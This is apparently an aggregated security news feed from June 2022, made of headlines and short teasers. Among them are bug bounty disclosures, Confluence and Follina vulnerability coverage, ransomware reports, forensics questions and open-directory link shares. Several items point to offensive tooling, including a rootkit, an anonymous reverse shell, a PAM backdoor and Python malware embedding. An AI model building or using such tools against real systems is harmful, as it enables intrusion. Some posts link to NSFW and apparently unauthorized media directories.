    Reddit disclosed a bug submitted by h1ugroon: https://hackerone.com/reports/1582778
    2 Cache Poisoning Attack Methods Affect Core Functionality www.exodus.com
    Exodus disclosed a bug submitted by bismillahfortuner: https://hackerone.com/reports/1581454
    Registered users contact information disclosure on salesforce lightning endpoint https://disposal.gsa.gov
    U.S. General Services Administration disclosed a bug submitted by rptl: https://hackerone.com/reports/1443654
  • Open

    You too can be a neuroscientist. Videos.
    Duke Univ. https://histology.oit.duke.edu/MBS/Videos/Neuro/ submitted by /u/inoculatemedia [link] [comments]
    [NSFW] Two nude photo directories that I found
    I did try to do a search to see if these links have come up before, and I didn't find anything. If they, in fact, did, then that's my bad. https://www.iammoon.com/helpers/boobs/ http://zascar.com/files/gifs/boobies/ submitted by /u/VerifiedNSFWThrowawa [link] [comments]
    HTTrack capturing the wrong link when I use the "Capture URL" feature?
    So I'm trying to download webpages from my Canvas portal (Learning Management System that has a history of all my grades, assignments, etc.) from my viewpoint logged in, for personal records. It uses two-factor authentication so I have to use the "Capture URL" feature. When I enter the provided proxy info into the browser and go to the webpage, instead of capturing the main page it keeps capturing a different link. Instead of http://[myuniversity].instructure.com/ it captures the URL as http://oscp.piki.googl/ with a string of numbers following it. I was wondering what could be going wrong here and how to fix it? I'm using the GUI Windows version of HTTrack. submitted by /u/beyondtheleaves [link] [comments]
  • Open

    Intigriti — XSS Challenge — February 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    How I gave rest to company’s email updates service
    Hello everyone, hope you all are doing well Continue reading on Medium »
    Wgel Walkthrough
    Welcome back, folks!! Today presenting one more boot to root kind of box from TryHackMe. It is a beginner-level box with some cool… Continue reading on Medium »
    Hacking Nginx: Best ways
    Nginx is being used in the wild since a while now. We all have seen NGINX name somewhere while coding/hacking. NGINX has always been a… Continue reading on InfoSec Write-ups »
    What I learnt from reading 126* Information Disclosure Writeups.
    Let’s tackle the most valuable and mysterious bug type… Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Side-Request-Forgery(CSRF) — Sample-2
    Hi Information Security folk, I hope you are well and doing great in your life, Before we go to the next step, You’ll need to learn about… Continue reading on Medium »
    My Pentest Log -21 — (Content-Type Checks)
    Greetings everyone from Porta Platea, Continue reading on Medium »
  • Open

    Shining the Light on Black Basta - documents some of the TTPs employed by a threat actor group who were observed deploying Black Basta ransomware
    submitted by /u/digicat [link] [comments]
    Passwordstate - Revoked its Digicert certificate used to sign the code
    submitted by /u/_r3l0ad3d [link] [comments]
    ESP-IDF Setup Guide - A guide on setting up an environment for ESP32 vulnerability research
    submitted by /u/Gallus [link] [comments]
  • Open

    Microsoft Follina Vulnerability in Windows Can Be Exploited Through Office 365
    Article URL: https://www.wired.com/story/microsoft-follina-vulnerability-windows-office-365/ Comments URL: https://news.ycombinator.com/item?id=31643486 Points: 1 # Comments: 0
    ESP-IDF Setup Guide – Setting up an environment for ESP32 vulnerability research
    Article URL: https://www.elttam.com/blog/esp-idf-setup-guide/ Comments URL: https://news.ycombinator.com/item?id=31637749 Points: 2 # Comments: 0
  • Open

    War in Ukraine / June 3–5
    Ukraine is facing a shortage of everything Continue reading on Medium »
    Ministry of Public Security — Chinese Cyber Espionage Over 19 Million People
    Continue reading on Medium »
    Use of Web Archive In OSINT Investigation ! Go back to past
    Using web archives allows you to see what a web page or site looked like in the past ! Continue reading on Medium »
  • Open

    Can Video Signal Adaptors (eg: displayport to HDMI) compromise your system?
    title. I'm aware how USB devices can compromise your system, and generally try to avoid hardware made from dubious countries (cheap GPUs from China anyone?) I'm in a bit of a pickle over video signal adaptors though. Where I'm from, practically all of these adaptors are manufactured in China. It also seems that some of them do active encoding/decoding between the various video signal types (VGA, HDMI, Displayport). From a purely technical perspective, can these adaptors compromise a system? Edit: Found this - https://www.ehacking.net/2016/07/exploring-vulnerabilities-in-hdmi.html submitted by /u/tappervogine [link] [comments]
    RIPE IP addresses
    This is a crazy question. I have a coworker who is convinced that all RIPE IP addresses carry a higher risk than, say, ARIN or other internet registries? I have a lot of respect for this person but I think this is an incorrect assumption? Thoughts? Thanks submitted by /u/DCbasementhacker [link] [comments]
  • Open

    SecWiki News 2022-06-06 Review
    Notes on CVE-2022-30190, Part 1 by 嘿嘿哈哈 For more of the latest articles, visit SecWiki
  • Open

    What's everyone using for remote memory acquisition?
    Hello. I say "remote" because most of our laptops are users WFH. What's everyone using to capture a memory image then acquire on remote workstation or server? submitted by /u/antmar9041 [link] [comments]
    What will it take to change the career path?
    Hi, everyone! The question is more out of curiosity... I've been in the IT industry for about 6 years now, mainly working as a sysadmin. I was recently promoted to cyber security analyst and started taking classes to suit my new position. One of my classes is digital forensic analysis, and I have always been fascinated by this field. Not that I am unhappy in my new role, and I definitely want to stay in these shoes for some time to build up my experience and knowledge and work on my portfolio. But I am wondering what and where I should start if I decide to go toward digital forensics? Thank you! submitted by /u/Austronaut1403 [link] [comments]
    Will the Real Msiexec Please Stand Up? Exploit Leads to Data Exfiltration
    🔥 New report out from TheDFIRReport crew! - ManageEngine SupportCenter Plus exploited - LSASS dump from web shell - Plink / RDP / Exfiltration Enjoy! https://t.co/J0Kpho5VU7 submitted by /u/samaritan_o [link] [comments]
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    CVE-2022-26134: In-Depth Analysis of the Confluence OGNL RCE Vulnerability and Bypassing the Sandbox for Command Echo on Newer Versions
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/nCMtSD7QH8ai6fpurJBXTg Vulnerability information Atlassian recently announced a critical Confluence vulnerability, CVE-2022-26134: judging from the description, this is once again an OGNL expression injection vulnerability. Affected versions: from 1.3.0 before 7.4.17 from 7.13.0 before 7.13...
    Follina Microsoft Office RCE with MS-MSDT Protoco
    Author: Y4er Original link: https://y4er.com/post/follina-microsoft-office-rce-with-ms-msdt-protocol/ Preface Saw an interesting Office RCE posted on Twitter. It seems to have originated from a tweet by nao_sec, and then I found an analysis article. https://doublepulsar.com/follina-a-microsoft-office-c...
  • Open

    An Overview of Threat Modeling
    What threat modeling is, how it works, the major threat modeling frameworks, tools and best practices.
    Comparing 8 Predictive Analytics Tools
    These tools include complex pipelines for collecting data from across the enterprise, add statistical analysis and machine learning layers to make predictions about the future, and distill those insights into useful summaries that business users can act on.
    Roundup: 9 Identity and Access Management Tools
    Ensuring secure access and identity management are two foundations of a cybersecurity posture.
    FreeBuf Morning Report | Fix Released for Confluence Zero-Day; Shaanxi Company Livestreams Its Employees at Work
    Atlassian has addressed an actively exploited critical remote code execution vulnerability (CVE-2022-26134) in its Confluence Server and Data Center products.
    Cryptocurrency Scams May Have Caused Over $1 Billion in Losses in the US
    Between January 2021 and March 2022, more than 46,000 Americans reported being targeted by cryptocurrency scams, with losses of at least $1 billion.
    In 2021, Apple Blocked 1.6 Million Apps That Defrauded Users
    Apple's App Store review team blocked more than 343,000 iOS apps for privacy violations.
    New Windows Search Zero-Day Can Be Exploited by Remotely Hosted Malware
    Attackers can exploit it by launching a Word document.
    "CCSIP 2022 China Cybersecurity Industry Panorama" Survey Launched | FreeBuf Consulting
    Macro, therefore comprehensive: the CCSIP 2022 panorama has officially launched.
    Critical Vulnerability Disclosed in UNISOC (紫光展锐) Chips Could Block Phones from Connecting to the Network
    UNISOC says it will fix the vulnerability immediately; Google also says it will fix it in the next Android security patch.
    GitLab Fixes Critical Account Takeover Vulnerability in Security Update
    GitLab has released critical security updates for multiple versions of its Community Edition and Enterprise Edition products to address eight vulnerabilities, one of them a critical account takeover flaw.
    亿格云: Using SASE to Solve Three Challenges of Enterprise Digitalization | Cybersecurity New Force SOLO Launch Season
    With remote work now the norm, how do you achieve unified enterprise security management? The Cybersecurity New Force SOLO Launch Season tells you.

  • Open

    How does Docker run Containers Under the Hood
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Heap overflow via HTTP/2 PUSH_PROMISE
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1589847
    KRB-FTP: Security level downgrade
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590102
  • Open

    Cloudflare observations of Confluence zero day (CVE-2022-26134)
    Article URL: https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31634770 Points: 6 # Comments: 0
    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    Article URL: https://bugalert.org/content/notices/2022-06-02-confluence.html?src=tw Comments URL: https://news.ycombinator.com/item?id=31626703 Points: 1 # Comments: 0
  • Open

    How Attacker could have suffocated the company staff
    Background: Continue reading on Medium »
    If It’s a Feature!!! Let’s Abuse It for $750
    Hello mates, Continue reading on Medium »
    Log Poisoning to Remote Code Execution | LFI | cUrl|
    In this article, we will see how to perform Remote Code Execution through Log Poisoning which is a type of Local File Inclusion. Continue reading on System Weakness »
  • Open

    “It’s Full of Secrets and User-Generated Classified Cyber Attack Information” — An Inside Peek
    A modern whiz-kid child story of the son of an ex-Communist era famous family from Bulgaria up to present day deep from the trenches. Continue reading on Medium »
    Hong Kong police tightening control over citizens on June 4th
    As they did last year, the Hong Kong administration tightened security and warned its residents not to gather to commemorate China’s… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s OSINT-inspired geek edition of the good news roundup, Russia’s tech industry reels under sanctions, and much more. Continue reading on Medium »
    Why the war? A quantitative answer
    Can looking at Russian and Ukrainian news wires shed light on the question? Continue reading on Medium »
    SPY NEWS: 2022 — Week 22
    Summary of the espionage-related news stories for the Week 22 (29 May-4 June) of 2022. Continue reading on Medium »
  • Open

    Old Blackberry (8300)
    I need to create a forensics copy from an old Blackberry 8300. Any suggestion? Thanks submitted by /u/Zipper_Ita [link] [comments]
    Let's solve challenges - Cellebrite 2022 CTF Writeup
    Despite having had little time, I took part in the lovely #CellebriteCTF last week! Please enjoy my writeup: https://www.dfirblog.com/cellebrite-2022-ctf-writeup/ Feel free to provide any feedback you desire! submitted by /u/samaritan_o [link] [comments]
    Decrypting a password locked .RAR file
    Hey there, I have a .RAR file that contains a backup of a Samsung phone. This file is created using Smart Switch - a Samsung software that creates a backup of the entire phone. The file is about 9GB. My client set a password for the backup, but now they forgot their password. They however, have several decrypted files when they extracted the RAR file a few years back – when they still knew the password. These decrypted files range from jpegs to mp4 and to pdfs. The directories in the RAR file can still be accessed with WinRAR. I can open the folders and see the contents of it including their metadata (i.e. date modified, file type, file size). But when I try to extract or open them, I am prompted to type a password. I know this seems like a long shot, but is there any chance the entire RAR file can be decrypted using some of the decrypted files? submitted by /u/wrappedbubble [link] [comments]
  • Open

    Nidhogg rootkit - An all in one rootkit for all windows 10 versions and windows 11 that can be managed with single hpp file
    submitted by /u/Idov31 [link] [comments]
    Analysis of a large brute force attack campaign against Windows Remote Desktop
    submitted by /u/jwizq [link] [comments]
    Conti RaaS group chat leaked (English translation) about firmware exploit and implant
    submitted by /u/hardenedvault [link] [comments]
    Code for Beating Google ReCaptcha and the funCaptcha using AWS Rekognition
    submitted by /u/ScottContini [link] [comments]
  • Open

    I want to dive into exploit dev; do I need to learn assembly language?
    submitted by /u/Doom_Guy777 [link] [comments]
  • Open

    SecWiki News 2022-06-05 Review
    Where do the initial innovations in computer science research come from? by ourren For more of the latest articles, visit SecWiki
  • Open

    Xepor: A Web Routing Framework for Reverse Engineering and Security Analysis
    Xepor is a web routing framework designed for reverse engineers and security researchers; it provides researchers with Flask-like API functionality.
    Tornado: A Powerful Anonymous Reverse Shell for Red Teams
    Tornado is a powerful red/blue team security research tool and also a powerful anonymous reverse shell.
    Java Deserialization Basics: Class Loaders
    This article/note covers class loaders, parent delegation, and the loading order of code blocks, ending with the loading of bytecode.
    EvilBox-One Target VM Penetration Test
    EvilBox: One is an easy-level target VM for VirtualBox.
  • Open

    Tails 5.1 arrives with a fix for a serious JavaScript security vulnerability
    Article URL: https://www.neowin.net/news/tails-51-arrives-with-a-fix-for-a-serious-javascript-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31630555 Points: 1 # Comments: 0
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Hunting suspicious LDAP queries in tons of logs
    Enumeration and Reconnaissance in AD Environment Continue reading on Medium »

  • Open

    I Have Find Serval Bugs In Circle.so & They Don’t Paid
    Hi Folks, Continue reading on Medium »
    Iagon Token Bridge UI Bug Bounty
    You better watch out, it’s bug hunting season! Continue reading on Iagon Official »
    Networking Protocols Explained | CyberSecurity
    Networking Protocols: FTP, SSH, Telnet, SMTP, DNS, HTTP, HTTPS, POP3, IMAP, RDP, TCP, UDP, ARP, RARP, DHCP, MTP, SFTP, SSL, TLS, NTP, PPP… Continue reading on Medium »
    DNS in easy way
    DNS is the phonebook of the internet, where domain names are translated to IP addresses. computer Continue reading on Medium »
  • Open

    What are some free non-zero policy encryption sites that protect data?
    I currently use Tresorit, and I store a single DB file of my customers on their site. However, I recently lost access and couldn't recover that file, but I did have a backup elsewhere. Instead of recovering the account, I was forced to reset my account because of said zero knowledge policy. submitted by /u/inert- [link] [comments]
    SynAck Red Team
    Hi, I saw many people mentioning they're part of SynAck Red Team. Is that a job ? are they getting paid ? submitted by /u/Spare_Prize1148 [link] [comments]
    How Likely is a Malicious MITM Attack on the Cellular Network?
    Hi everyone, For background: I have been playing around with a SIM7000e 4G module that connects to the CAT-M1 cellular network here in Australia. I purchased it in order to send GPS coordinates to dweet . io. Essentially I want to make a GPS tracker for my motorcycle. The thing is: I can send data via HTTP but not HTTPS. I have been trying for so many hours to send data via HTTPS with no luck. Some AT commands you're supposed to input, the module doesn't seem to even recognize. But that's not why I am here. I wanted to ask how likely is it that a hacker could use something like a stingray to grab my GPS coordinates if I sent them via HTTP? Does this type of attack happen often? (No personal details or other info would be sent with the coordinates) I have heard that devices like stingrays are extremely hard to get and very expensive. Furthermore, a hacker would not immediately know what the numbers mean, and even if they did, would not know what is currently situated at those coordinates. I am assuming that I am just being paranoid? Thanks submitted by /u/F0restFiend [link] [comments]
    Please help me with an internet stalker
    My best friend has been recently bombarded with dms on Instagram. They come from accounts that either have her name, birth date, or something along the lines. The messages are very graphic and threatening, telling her that if she attends a party or something they will sexually assault her or in some cases, end with her life. One of these accounts has also sent her a photo of her own house with similar caption. They messaged her mom, her friends, basically everyone in her social circle. The case has already been presented to the police but there's been no advances and each day she grows concerned. Is there any way to track a location, an email, a name, just... anything, if I provide a link to one of the profiles? I already tried out online tools and none have proven to be successful. If this weren't of such urgency I would not be asking, but we are running out of options. Each day is more terrifying for her, and painful for us, her friends. Thank you in advance. submitted by /u/smly7 [link] [comments]
  • Open

    Github Account Takeover from Docs page of `kubernetes-csi.github.io`
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1434967 - Bounty: $100
  • Open

    My website/domain investigation toolkit
    Domain and hosting data Reverse lookup Traffic and CMS analysis AD and DNS analysis  Backup and other services Continue reading on Medium »
    Ethereum OSINT
    I watched an interesting speech by Jeff Lomas, Detective and Criminologist with the Las Vegas Police Department on the investigation of… Continue reading on Medium »
    A Guide To Twitter advanced search operators: twitter hacking
    Social media intelligence (SMI or SOCMINT) Continue reading on Medium »
  • Open

    SecWiki News 2022-06-04 Review
    Analysis of Port Scanning Technique Implementations by ourren Awesome-Redteam: A Red Team Knowledge Repository by ourren Attack and Defense with the ATT&CK Matrix by ourren Analysis of the bandit Tool by ourren Hands-on Code Audit Based on Framework Vulnerabilities by ourren Getting Started with MITRE ATT&CK in Practice by ourren Tomcat CVE-2022-29885 by ourren For more of the latest articles, visit SecWiki
  • Open

    Certificate Ripper released - tool to extract server certificates
    submitted by /u/Hakky54 [link] [comments]
    Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552) - including remote write anywhere primitive in its IP stack
    submitted by /u/digicat [link] [comments]
  • Open

    How a Beginner Can Get to Grips with mimikatz
    mimikatz was a hurdle I ran into; I want to document the process to help everyone master mimikatz's usage and techniques more quickly.
  • Open

    Is there a way (maybe an extension) to show thumbnails for image lists like these? It would be nice to see what each item is before clicking it.
    submitted by /u/PmMeUrEncouragements [link] [comments]
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    PCIe DMA Attack against a secured Jetson Nano (CVE-2022-21819)
    Article URL: https://www.thegoodpenguin.co.uk/blog/pcie-dma-attack-against-a-secured-jetson-nano-cve-2022-21819/ Comments URL: https://news.ycombinator.com/item?id=31617467 Points: 23 # Comments: 0
  • Open

    UFED alternative for Samsung
    How can I make a forensic copy of a Samsung smartphone without UFED? Is there any free/open source software or solution? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134)
    CVE-2022-26134 is a critical severity unauthenticated remote code execution vulnerability in Atlassian Confluence Server and Data Center. We share statistics on potentially vulnerable servers and provide suggestions for mitigation. The post Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) appeared first on Unit42.
  • Open

    The Core of K8s Is the API, Not Containers: From Theory to CRD Practice (2022)
    This article ties together the core parts of the following articles: Kubernetes isn't about containers, 2021; Kubernetes is a Database, 2019; CRD is just a table in Kubernetes, 2020. It argues that the core value of K8s is its general-purpose, cross-vendor and cross-platform, flexibly extensible declarative API framework rather than containers (although containers are the foundation of its success); it then creates an API extension (CRD) by hand and uses tests and analogies to build a more intuitive understanding of that argument. Examples and tests are based on K8s v1.21.0; thanks to the original authors for their excellent articles. 1 The core of K8s is its API framework, not containers 1.1 Containers are the foundation 1.2 The API is the core 1.2.1 Before K8s: everyone reinvented the wheel, wrapping vendor API differences 1.2.2 K8s arrives: standardized, cross-vendor APIs, structures and semantics 1.2.3 K8s API extensions: CRD 1.3 Summary 2 K8s API types 2.1 Standard APIs (for built-in resource types) 2.1.1 Namespaced types 2.1.2 Un-namespaced types 2.2 Extension APIs (apiextension) 2.2.1 Namespaced types 2.2.2 Un-namespaced types 2.3 CRD 3 Intuitive analogy: K8s is a database, a CRD is a table, the API is SQL 3.1 K8s is a database 3.2 A CRD is a table 3.2.1 Defining the table structure (CRD spec) 3.2.2 Test: CR create/delete/query/update vs. database SQL 3.3 The API is SQL 4 Other 4.1 Labeling CRs and filtering by label 4.2 K8s API and authorization control (R…

  • Open

    Popping Eagle: How Global Analytics Uncovered a Stealthy Threat Actor
    submitted by /u/RamblinWreckGT [link] [comments]
    Technical Analysis of Confluence CVE-2022-26134
    submitted by /u/chicksdigthelongrun [link] [comments]
    Detecting and mitigating CVE-2022-26134: Zero day at Atlassian Confluence
    submitted by /u/MiguelHzBz [link] [comments]
    Meeting Owl Pwnage
    submitted by /u/RudyWaltz [link] [comments]
    Released new version SCodeScanner. Added yaml scanning ability for scanning kubernetes configuration files. Github - https://github.com/agrawalsmart7/scodescanner
    submitted by /u/agrawal7 [link] [comments]
    WinRS and Exchange, a sneaky backdoor
    submitted by /u/picobello_bv [link] [comments]
    CVE-2022-30190 : Microsoft Windows Support Diagnostic Tool RCE
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Swedish newspaper archive. 1884-2022.
    https://paperarchive-prod.svd.se/ submitted by /u/Pelicaros [link] [comments]
    Tons of scans of old books. Some older than the year 1600.
    http://scans.cartago.nl/ I have no idea what these books are about. Thought some of y'all might enjoy. I copied this from the main site: Are you a new visitor or do you want to know more about this site? This section gives you background information about Cartago. Also take a look at the Frequently Asked Questions for more information. What is Cartago? Cartago is the computer system of the Digital Charter Book Groningen and Drenthe. Nearly 35,000 deeds and other documents from before 1600 are included. This makes the sources for medieval culture and history accessible to a wide audience. Cartago is an initiative of the Stichting Digitaal Oorkondeboek Groningen and Drenthe. This foundation consists of representatives of the University of Groningen, the Groninger Archives, the Drents Archive and the former Drents Plateau. Learn more about the organization . Charters as source The charters are the main sources for Groningen and Drenthe up to 1600. This is special because elsewhere in the Netherlands usually city accounts, protocols and other registers are also available. Anyone who wants to research the Groningen and Drenthe history and culture before 1600 will therefore have to deal with the charters. Whether it concerns research into a village, a farm or a family. A charter is a document that serves as proof of a legal act. More information… Who is Cartago intended for? Cartago is suitable for anyone who is researching: genealogy and heraldry local and regional history linguistics onomastics church history socio-economic history legal history In addition, Cartago focuses on education, including the charter game. Search in Cartago Via the Search section, visitors can quickly search the database. In addition to the images of the charters, any available transcripts also appear on the screen. A transcript is a translation of the medieval text. Inventories ( www.archieven.nl ) can also be used to search for deeds. submitted by /u/Pelicaros [link] [comments]
    pictures from a hospital in Africa, marked NSFW because of a few images of skin infections of some kind
    submitted by /u/subwaytech [link] [comments]
  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. So usually I don’t post writeups about HackTheBox challenges. But this was one of the… Continue reading on Medium »
    Burp Suite: Do I need the professional edition?
    No but it helps Continue reading on Medium »
    My first bug bounty in Business Logic
    Hey Hello, Hackers, Continue reading on Medium »
    Bug Bounty — Continue Penetration Testing
    Continue reading on Medium »
    2FA Bypass due to unauthorized 2FA disabling via X/CSRF
    Product Info Continue reading on Medium »
  • Open

    Understanding REvil: REvil Threat Actors May Have Returned (Updated)
    Ransomware cases worked by Unit 42 consultants in the first six months of 2021 reveal insights into the preferred tactics of REvil threat actors. The post Understanding REvil: REvil Threat Actors May Have Returned (Updated) appeared first on Unit42.
  • Open

    Solving Step 2 of Downtown Murderer without using reverse image search — Hacktoria
    Hacktoria’s monthly CTF in May was Downtown Murderer. There were 6 steps and I will focus in Step 2, which consists in geolocate three… Continue reading on Medium »
    War in Ukraine / June 2
    The first 100 days of the war in Ukraine Continue reading on Medium »
    The OSINT Exposure of Offshore Oil Platforms
    Offshore oil platforms, also known as oil rigs, are large industrial control systems meant to pull and process oil and natural gas from… Continue reading on Medium »
    The reverse image tools I use
    The reverse image tools I use Continue reading on Medium »
  • Open

    8ybhy85kld9zp9xf84x6.imgur.com Subdomain Takeover
    Imgur disclosed a bug submitted by mr_baka: https://hackerone.com/reports/1527405 - Bounty: $50
  • Open

    Apple Silicon “Augury” DMP Vulnerability
    Article URL: https://mjtsai.com/blog/2022/06/03/apple-silicon-augury-dmp-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31610726 Points: 2 # Comments: 0
    U.S. Technology, a Longtime Tool for Russia, Becomes a Vulnerability
    Article URL: https://www.nytimes.com/2022/06/02/business/economy/russia-weapons-american-technology.html Comments URL: https://news.ycombinator.com/item?id=31609058 Points: 3 # Comments: 0
  • Open

    What areas in DFIR are lacking research?
    What are some areas in DFIR that are lacking industry research? What would you want to see more of? submitted by /u/haloman882 [link] [comments]
    Evidence Mover / Robocopy / Teracopy ?
    Hi all! I have searched already for these keywords and I could not locate any previous questions related to this. What are you using for copying evidence from A to B? I have tried the tools mentioned in the title, but I was wondering if there is something different/better. Maybe even command-line? Workstations at work are Windows so I'm looking for options for Windows. submitted by /u/agente_99 [link] [comments]
  • Open

    SecWiki News 2022-06-03 Review
    No news updates today~ For more of the latest articles, visit SecWiki
  • Open

    Vulnerability Management Runbook
    Hello guys/gals of this community. Does anyone have experience with creating vulnerability management runbooks? Or any resources that I can lean on? submitted by /u/hannibal_the_general
    Starting with car hacking
    A little backstory first: after 15 years in various software development roles (using mostly C and C++), I have lost all motivation about the field. Recently, I came across the research of Charlie Miller and Chris Valasek, and it sparked my interest for tech again. So the question is, what and from where do I start learning networking to be able to break into the car pentesting industry? I know very basic stuff, like subnetting, but not much more. Most tutorials on the internet do not go beyond just being able to answer the CCNA test's questions. submitted by /u/Idonotlikeworking
    I need help
    So someone I know has her SNS accounts being hacked; she gets notified via email if her FB is being tapped into. The email shows the device name. What I'm asking is whether it's possible to trace the device name, or at least the IP address, using the device name. submitted by /u/IncidentMinimum

    Java Deserialization Basics: JDK Dynamic Proxies
    Java Deserialization Basics: JDK Dynamic Proxies. One article to sort out what a JDK dynamic proxy actually is, as groundwork for the Commons Collections (cc) gadget chain analysis that follows.
    A Maze as an Analogy for PHP Deserialization Chains
    Walking a maze as an analogy for PHP deserialization chains: an approach to analyzing PHP framework deserialization vulnerabilities once you understand the basic principle of the bug.

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting up a local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    Android Pentesting Methodology (Pt. 1)

    CVE-2022-26134: Active Exploitation of Atlassian Confluence
    Article URL: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31604711 Points: 2 # Comments: 0
    CVE-2022-26134: RCE in Atlassian Confluence and Data Center products
    Article URL: https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data Comments URL: https://news.ycombinator.com/item?id=31604258 Points: 3 # Comments: 1

    Red Team Server
    Red Team Server (RTS) Continue reading on Medium »
    2FA Bypass due to unauthorized 2FA disabling via X/CSRF
    Product Info Continue reading on Medium »

    Daily Cyber Brief
    submitted by /u/RandyMarsh_Lorde
    Exploiting CVE-2022-26923 by Abusing AD CS
    We are doing 2 THM labs. In the first one we are abusing vulnerable certificate templates manually with Certify and Rubeus, then changing the domain Administrator's password. In the second lab, we are utilizing the Certipy PoC to take over the DC machine and dump hashes for all users. Available on YouTube: https://youtu.be/HBRCI5O35R8 Hope you enjoy the video and learn something new. The channel is new and all feedback is appreciated. submitted by /u/lsecqt

    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    submitted by /u/sullivanmatt
    Mining Google Chrome CVE data
    submitted by /u/onlinereadme

    Confluence – Critical unauthenticated remote code execution vulnerability
    Article URL: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html Comments URL: https://news.ycombinator.com/item?id=31601794 Points: 10 # Comments: 3
    Illumina Cybersecurity Vulnerability
    Article URL: https://www.fda.gov/medical-devices/letters-health-care-providers/illumina-cybersecurity-vulnerability-may-present-risks-patient-results-and-customer-networks-letter Comments URL: https://news.ycombinator.com/item?id=31600655 Points: 1 # Comments: 0

    Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor
    We observed a specially crafted DLL hijacking attack used by a previously unknown piece of malware that we dubbed Popping Eagle. The post Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor appeared first on Unit42.

    Embedding Python Malware
    Writing malware in C is cool. What’s cooler? Writing malware in Python and embedding it in C-based malware. Let’s learn how to do that. Continue reading on Medium »

    iPhone remotely wiped inside Faraday box
    I have an iPhone 11 that was remotely wiped while it was inside a Faraday cage. The phone was turned on while it was inside the cage; it booted into the "lost phone" screen for less than a second and then it began the wiping process. Any ideas on how something like this could happen? submitted by /u/croforensic
    Internship/Mentorship opportunities
    Hello all, I'm currently pursuing my Bachelor's degree in Computer Forensics and Digital Investigation. I will be graduating next year and wanted to ask if anyone knew some places I can apply to for an internship, or if anyone has mentorship programs. I want to get my foot in the door and start doing some hands-on work and learning the day-to-day work style. I would really appreciate any help or information on this matter. Thank you all in advance. submitted by /u/Sudden_Ad9859
    FTK Imager error
    Hi, I did an FTK image of an SSD. I started and everything went well until FTK got to the point where it is verifying the image; I got this message: “imager encountered 32 error(s). the image is corrupted imager will attempt to retrieve remaining valid data”. It still started to do a verification check after and, no surprise, it did end up not matching. But my question is: what does it mean? Does it have something to do with the cables? The data on the SSD? Or something else? If I understand it correctly I’m only copying the image, so corrupted files shouldn’t be a problem, right? Also I’m taking an image from a Windows computer's SSD. submitted by /u/Gackie
    Chain of custody form
    Do you recommend the proposal of changing the traditional hardcopy chain of custody form to a digital chain of custody? And why so? submitted by /u/alialibarrett
    SMS Forensics - Android
    Assuming I have an unlocked Android phone, I’d like to test mobile forensics tools, especially with SMS. Any recommendations on tools & techniques to image, parse and extract SMS info from an Android device? I want to be able to answer questions like: When was a message sent/received? Has the timestamp been tampered with? Does it recognize different time zones and then normalize the timestamps? Thank you. submitted by /u/trafficbridge

    More Misc Stuff
    submitted by /u/ilikemacsalot
    Misc Stuff
    submitted by /u/ilikemacsalot
    A few movies & series
    http://51.68.207.131/ Not a lot here, but did see some newer content. submitted by /u/dasheswithdots
    photos of car parts
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Australian aviation photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    Mining Google Chrome CVE Data
    Article URL: https://clearbluejar.github.io/posts/mining-google-chrome-cve-data/ Comments URL: https://news.ycombinator.com/item?id=31599584 Points: 2 # Comments: 0
    Using the Kani Rust Verifier on a Rust Standard Library CVE
    Article URL: https://model-checking.github.io//kani-verifier-blog/2022/06/01/using-the-kani-rust-verifier-on-a-rust-standard-library-cve.html Comments URL: https://news.ycombinator.com/item?id=31594351 Points: 3 # Comments: 0

    The Fuzzing Book
    Article URL: https://www.fuzzingbook.org/ Comments URL: https://news.ycombinator.com/item?id=31598335 Points: 39 # Comments: 1

    How to scope what hardware I need for network monitoring?
